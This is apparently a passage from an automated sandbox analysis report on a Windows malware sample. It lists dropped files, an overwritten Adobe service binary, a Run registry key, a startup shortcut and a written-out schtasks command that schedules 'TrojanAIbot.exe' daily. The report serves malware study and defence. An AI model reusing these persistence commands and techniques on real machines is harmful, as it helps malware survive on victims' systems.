                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 13_2_01210C45 push ebx; retf 13_2_01210C52
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0499632D push eax; ret 16_2_04996341

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\neworigin.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Wisrysxl.PIFJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\lxsyrsiW.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:05 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WisrysxlJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_02E5AB1C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
